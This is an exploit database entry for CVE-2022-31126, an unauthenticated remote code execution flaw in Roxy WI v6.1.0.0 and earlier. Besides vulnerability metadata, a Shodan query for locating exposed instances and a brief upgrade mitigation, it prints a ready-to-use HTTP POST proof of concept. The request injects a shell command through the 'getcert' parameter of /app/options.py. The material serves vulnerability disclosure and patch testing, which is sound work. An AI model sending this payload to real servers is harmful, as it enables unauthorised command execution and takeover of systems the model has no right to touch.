header-logo
Suggest Exploit
vendor:
Roxy WI
by:
Nuri Çilengir
9.8
CVSS
CRITICAL
Unauthenticated Remote Code Execution (RCE)
CWE
Product Name: Roxy WI
Affected Version From: Roxy WI <= v6.1.0.0
Affected Version To:
Patch Exists: YES
Related CWE: CVE-2022-31126
CPE:
Metasploit:
Other Scripts:
Tags: cve,cve2022,rce,unauth,roxy,packetstorm
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: http://packetstormsecurity.com/files/167805/Roxy-WI-Remote-Command-Execution.htmlhttps://www.cve.org/CVERecord?id=CVE-2022-31137https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-mh86-878h-43c9https://nvd.nist.gov/vuln/detail/CVE-2022-31137https://nvd.nist.gov/vuln/detail/CVE-2022-31126
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.html:"Roxy-WI"', 'verified': True, 'vendor': 'roxy-wi', 'product': 'roxy-wi'}
Platforms Tested: Ubuntu 22.04
2022

Roxy WI v6.1.0.0 – Unauthenticated Remote Code Execution (RCE)

The Roxy WI version 6.1.0.0 and below are vulnerable to unauthenticated remote code execution (RCE). An attacker can exploit this vulnerability to execute arbitrary code without authentication.

Mitigation:

Upgrade to a patched version of Roxy WI.
Source

Exploit-DB raw data:

# ADVISORY INFORMATION
# Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)
# Date of found: 21 July 2022
# Application: Roxy WI <= v6.1.0.0
# Author: Nuri Çilengir 
# Vendor Homepage: https://roxy-wi.org
# Software Link: https://github.com/hap-wi/roxy-wi.git
# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-31126


# PoC
POST /app/options.py HTTP/1.1
Host: 192.168.56.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 73
Origin: https://192.168.56.116
Referer: https://192.168.56.116/app/login.py
Connection: close

show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcert=;id;

Navigation

Suggest Exploit

Services By CQR